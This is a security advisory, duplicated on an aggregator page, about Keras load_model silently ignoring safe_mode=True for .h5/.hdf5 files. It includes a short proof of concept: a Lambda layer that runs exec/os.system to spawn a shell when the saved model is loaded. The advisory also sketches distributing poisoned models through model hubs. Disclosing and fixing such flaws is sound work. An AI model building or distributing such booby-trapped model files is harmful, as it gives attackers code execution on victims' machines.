Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-36rr-ww3j-vrjv: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.


Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here’s the relevant snippet:

def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you’re open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")

From the victim’s side, triggering code execution is just as simple:

import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

ghsa
#vulnerability#mac#google#ssl

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.

Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details****Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here’s the relevant snippet:

def load_model(filepath, custom_objects=None, compile=True, safe_mode=True): is_keras_zip = … is_keras_dir = … is_hf = …

\# Support for remote zip files
if (
    file\_utils.is\_remote\_path(filepath)
    and not file\_utils.isdir(filepath)
    and not is\_keras\_zip
    and not is\_hf
):
    ...

if is\_keras\_zip or is\_keras\_dir or is\_hf:
    ...

if str(filepath).endswith((".h5", ".hdf5")):
    return legacy\_h5\_format.load\_model\_from\_hdf5(
        filepath, custom\_objects\=custom\_objects, compile\=compile
    )

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you’re open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

import keras

f = lambda x: ( exec("import os; os.system(‘sh’)"), x, )

model = keras.Sequential() model.add(keras.layers.Input(shape=(1,))) model.add(keras.layers.Lambda(f)) model.compile()

keras.saving.save_model(model, “./provola.h5”)

From the victim’s side, triggering code execution is just as simple:

import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(…) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

References

  • GHSA-36rr-ww3j-vrjv
  • https://nvd.nist.gov/vuln/detail/CVE-2025-9905
  • keras-team/keras#21602

ghsa: Latest News

GHSA-36rr-ww3j-vrjv: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.